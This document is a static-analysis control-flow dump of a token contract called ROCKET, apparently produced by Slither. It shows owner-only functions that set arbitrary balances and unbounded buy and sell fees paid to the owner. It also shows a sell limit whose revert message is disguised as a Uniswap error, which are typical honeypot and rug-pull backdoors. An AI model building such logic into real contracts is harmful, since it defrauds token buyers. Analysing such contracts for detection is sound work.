Contract: IERC20
==================================================


Contract: ROCKET
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _totalSupply = 1000_000_000 * 10 ** 18

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _saleLimit = 0

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: _tokenHolder = tokenHolder

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: _balances[_tokenHolder] = _totalSupply

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: _excluded[_tokenHolder] = true

  ID: 6
  Type: NodeType.EXPRESSION
  Expression: _owner = msg.sender

  ID: 7
  Type: NodeType.EXPRESSION
  Expression: delayTime = 15

  ID: 8
  Type: NodeType.EXPRESSION
  Expression: lastTransactionTime = block.timestamp

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6
  6 -> 7
  7 -> 8

Function: setTokenContract
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: tokenContract = _tokenContract

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: _transferOwnership
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: oldOwner = _owner

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _owner = newOwner

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: OwnershipTransferred(oldOwner,newOwner)

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 4
  1 -> 2
  2 -> 3
  4 -> 1

Function: addPoolAddress
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _pools[_poolAddress] = true

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: deletePoolAddress
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _pools[_poolAddress] = false

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: excludeFromFee
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _excluded[_address] = true

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: includeInFee
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _excluded[_address] = false

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: setSellFee
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: sell_fee = _sell_fee

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: setBuyFee
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: buy_fee = _buy_fee

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: setBalance
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _balances[_address] = _balance

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: setSellLimit
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _saleLimit = newSaleLimit

  ID: 2
  Type: NodeType.RETURN
  Expression: true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 3
  1 -> 2
  3 -> 1

Function: _transfer
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(from != address(0),ERC20: transfer from the zero address 2)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: fromBalance = _balances[from]

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(fromBalance >= amount,ERC20: transfer amount exceeds balance 2)

  ID: 4
  Type: NodeType.VARIABLE
  Expression: 

  ID: 5
  Type: NodeType.IF
  Expression: _excluded[from] || _excluded[to]

  ID: 6
  Type: NodeType.EXPRESSION
  Expression: _balances[from] = fromBalance - amount

  ID: 7
  Type: NodeType.EXPRESSION
  Expression: _balances[to] += amount

  ID: 8
  Type: NodeType.EXPRESSION
  Expression: val = amount

  ID: 9
  Type: NodeType.IF
  Expression: _pools[from]

  ID: 10
  Type: NodeType.VARIABLE
  Expression: _this_scat = buy_fee

  ID: 11
  Type: NodeType.VARIABLE
  Expression: _amount = amount * (100 - _this_scat) / 100

  ID: 12
  Type: NodeType.EXPRESSION
  Expression: _balances[from] = fromBalance - amount

  ID: 13
  Type: NodeType.EXPRESSION
  Expression: _balances[to] += _amount

  ID: 14
  Type: NodeType.EXPRESSION
  Expression: val = _amount

  ID: 15
  Type: NodeType.VARIABLE
  Expression: _this_scat_amount = amount * _this_scat / 100

  ID: 16
  Type: NodeType.EXPRESSION
  Expression: _balances[_owner] += _this_scat_amount

  ID: 17
  Type: NodeType.IF
  Expression: _pools[to]

  ID: 18
  Type: NodeType.IF
  Expression: _saleLimit > 0

  ID: 19
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(amount <= _saleLimit,Uniswap RouterV02: K2)

  ID: 20
  Type: NodeType.ENDIF
  Expression: 

  ID: 21
  Type: NodeType.VARIABLE
  Expression: _this_scat_scope_0 = sell_fee

  ID: 22
  Type: NodeType.VARIABLE
  Expression: _amount_scope_1 = amount * (100 - _this_scat_scope_0) / 100

  ID: 23
  Type: NodeType.EXPRESSION
  Expression: _balances[from] = fromBalance - amount

  ID: 24
  Type: NodeType.EXPRESSION
  Expression: _balances[to] += _amount_scope_1

  ID: 25
  Type: NodeType.EXPRESSION
  Expression: val = _amount_scope_1

  ID: 26
  Type: NodeType.VARIABLE
  Expression: _this_scat_amount_scope_2 = amount * _this_scat_scope_0 / 100

  ID: 27
  Type: NodeType.EXPRESSION
  Expression: _balances[_owner] += _this_scat_amount_scope_2

  ID: 28
  Type: NodeType.EXPRESSION
  Expression: _balances[from] = fromBalance - amount

  ID: 29
  Type: NodeType.EXPRESSION
  Expression: _balances[to] += amount

  ID: 30
  Type: NodeType.EXPRESSION
  Expression: val = amount

  ID: 31
  Type: NodeType.ENDIF
  Expression: 

  ID: 32
  Type: NodeType.ENDIF
  Expression: 

  ID: 33
  Type: NodeType.ENDIF
  Expression: 

  ID: 34
  Type: NodeType.RETURN
  Expression: val

  ID: 35
  Type: NodeType.EXPRESSION
  Expression: onlyContract()

Edges:
  0 -> 35
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6
  5 -> 9
  6 -> 7
  7 -> 8
  8 -> 33
  9 -> 10
  9 -> 17
  10 -> 11
  11 -> 12
  12 -> 13
  13 -> 14
  14 -> 15
  15 -> 16
  16 -> 32
  17 -> 18
  17 -> 28
  18 -> 19
  18 -> 20
  19 -> 20
  20 -> 21
  21 -> 22
  22 -> 23
  23 -> 24
  24 -> 25
  25 -> 26
  26 -> 27
  27 -> 31
  28 -> 29
  29 -> 30
  30 -> 31
  31 -> 32
  32 -> 33
  33 -> 34
  35 -> 1

Function: balanceOf
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: _balances[account]

Edges:
  0 -> 1

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: sell_fee = 0

  ID: 1
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: buy_fee = 0

Edges:
  0 -> 1


